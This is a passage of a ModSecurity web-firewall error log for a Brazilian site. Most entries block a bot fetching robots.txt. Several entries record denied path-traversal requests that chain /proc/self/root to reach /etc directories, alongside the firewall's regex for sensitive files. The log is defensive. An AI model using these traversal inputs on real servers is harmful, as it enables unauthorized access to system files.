"abiJhv9ocpUE4ed4uDwc-wAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:51:55.495040 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:53640] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiJi46lpbStxTqkSkuPuAAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:52:23.060244 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.228.16:52234] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiJp6TCbgAP5jq5TehTOgAAAsk"]
[Mon Mar 16 19:55:18.864222 2026] [:error] [pid 29507:tid 140411741927168] [client 74.7.244.31:50326] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiKVkr9dMAiw-8KANNxAwAAAQA"]
[Mon Mar 16 19:57:51.260639 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.228.16:39944] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiK76QpVkWug9HeOt9bEAAAA08"]
[Mon Mar 16 20:00:24.135509 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.244.31:44224] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiLiNSswJuvopo3lOiK2QAAAIU"]
[Mon Mar 16 20:03:00.530803 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.228.16:60100] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiMJLABkC4fWIHEf8EjLAAAAFY"]
[Mon Mar 16 20:05:46.979191 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.244.31:40938] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiMys_BxrYCr4hPDw8V-QAAAco"]
[Mon Mar 16 20:08:15.975891 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.228.16:49562] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiNX7ABkC4fWIHEf8Ej-QAAAFQ"]
[Mon Mar 16 20:10:52.814849 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.244.31:33356] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiN_I6lpbStxTqkSkuREAAAAkw"]
[Mon Mar 16 20:13:25.317186 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.228.16:51688] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiOk1ajLEzk2WiQ-1081wAAAok"]
[Mon Mar 16 20:15:52.925355 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.244.31:42448] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiPKI6lpbStxTqkSkuRZwAAAlc"]
[Mon Mar 16 20:20:53.137478 2026] [:error] [pid 29507:tid 140411548894976] [client 74.7.244.31:50916] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiQVUr9dMAiw-8KANNyjQAAARc"]
[Mon Mar 16 20:29:17.706870 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.228.16:58010] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiSTaQpVkWug9HeOt9dCgAAA0Q"]
[Mon Mar 16 20:31:11.692967 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.244.31:48716] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiSv46lpbStxTqkSkuR4QAAAlI"]
[Mon Mar 16 20:34:26.335882 2026] [:error] [pid 29507:tid 140411574073088] [client 74.7.228.16:32864] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiTgkr9dMAiw-8KANNzTQAAARQ"]
[Mon Mar 16 20:36:14.121975 2026] [:error] [pid 29507:tid 140411565680384] [client 74.7.244.31:36736] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiT7kr9dMAiw-8KANNzYQAAARU"]
[Mon Mar 16 20:39:58.076079 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.228.16:34738] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiUzo6lpbStxTqkSkuSJwAAAkg"]
[Mon Mar 16 20:41:14.755265 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.244.31:41326] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiVGrysWC90G-1nBrBwlgAAAZc"]
[Mon Mar 16 20:45:07.043815 2026] [:error] [pid 15061:tid 140411674785536] [client 74.7.228.16:48566] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiWA6TCbgAP5jq5TehWpgAAAsg"]
[Mon Mar 16 20:46:18.890655 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.244.31:52850] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiWSrysWC90G-1nBrBxLAAAAZQ"]
[Mon Mar 16 20:50:28.487307 2026] [:error] [pid 15061:tid 140411565680384] [client 74.7.228.16:48416] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiXRKTCbgAP5jq5TehW-gAAAtU"]
[Mon Mar 16 20:55:31.273524 2026] [:error] [pid 29802:tid 140411666392832] [client 74.7.228.16:38954] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiYc8_BxrYCr4hPDw8YwwAAAck"]
[Mon Mar 16 20:56:23.920087 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.244.31:35808] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiYp9SswJuvopo3lOiOggAAAJg"]
[Mon Mar 16 21:00:52.871359 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.228.16:33016] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiZtLABkC4fWIHEf8EphwAAAE8"]
[Mon Mar 16 21:01:32.470350 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.244.31:47538] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiZ3FajLEzk2WiQ-11A3AAAApU"]
[Mon Mar 16 21:06:01.935021 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.228.16:44842] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abia6bysWC90G-1nBrByFwAAAY0"]
[Mon Mar 16 21:06:43.691783 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.244.31:48660] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abibE7ABkC4fWIHEf8Ep6QAAAEI"]
[Mon Mar 16 21:11:26.487429 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.228.16:41526] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abicLtSswJuvopo3lOiPYQAAAJA"]
[Mon Mar 16 21:11:47.950679 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.244.31:47952] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abicQ_9ocpUE4ed4uDwiKwAAAgk"]
[Mon Mar 16 21:16:29.345241 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.228.16:59730] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abidXUr9dMAiw-8KANN2fgAAAQQ"]
[Mon Mar 16 21:16:48.866883 2026] [:error] [pid 29802:tid 140411649607424] [client 74.7.244.31:43950] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abidcM_BxrYCr4hPDw8ZzQAAAcs"]
[Mon Mar 16 21:21:56.422916 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.244.31:39664] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiepKTCbgAP5jq5TehZMgAAAtE"]
[Mon Mar 16 21:32:13.827480 2026] [:error] [pid 14895:tid 140411632822016] [client 74.7.228.16:48248] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abihDVajLEzk2WiQ-11DRAAAAo0"]
[Mon Mar 16 21:32:40.362831 2026] [:error] [pid 29507:tid 140411683178240] [client 74.7.244.31:40634] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abihKEr9dMAiw-8KANN3mgAAAQc"]
[Mon Mar 16 21:37:17.600297 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.228.16:35062] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiiPf9ocpUE4ed4uDwjVAAAAgA"]
[Mon Mar 16 21:37:43.669132 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.244.31:47068] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiiV7ABkC4fWIHEf8Er7QAAAFY"]
[Mon Mar 16 21:42:38.467225 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.228.16:40656] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abijftSswJuvopo3lOiQzAAAAJU"]
[Mon Mar 16 21:43:00.979113 2026] [:error] [pid 15568:tid 140411666392832] [client 74.7.244.31:34486] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abijlKQpVkWug9HeOt9gxgAAA0k"]
[Mon Mar 16 21:47:50.807549 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.228.16:42796] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abikto6lpbStxTqkSkuVygAAAlQ"]
[Mon Mar 16 21:48:16.098445 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.244.31:35522] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abik0KTCbgAP5jq5Teha2AAAAtQ"]
[Mon Mar 16 21:53:05.214654 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.228.16:42800] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abil8f9ocpUE4ed4uDwkvQAAAhY"]
[Mon Mar 16 21:54:41.369594 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:50732] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abimUY6lpbStxTqkSkuWcQAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 21:55:23.146652 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.241.46:40086] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abime6TCbgAP5jq5TehbLgAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 21:58:27.990224 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.228.16:48730] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abinM7ABkC4fWIHEf8EtmgAAAFI"]
[Mon Mar 16 21:58:43.170508 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.244.31:37084] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abinQ_9ocpUE4ed4uDwlYQAAAgA"]
[Mon Mar 16 21:59:58.904717 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.241.46:39974] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abinjqQpVkWug9HeOt9ifAAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:01:17.946159 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.241.46:35022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abin3bysWC90G-1nBrB1NgAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
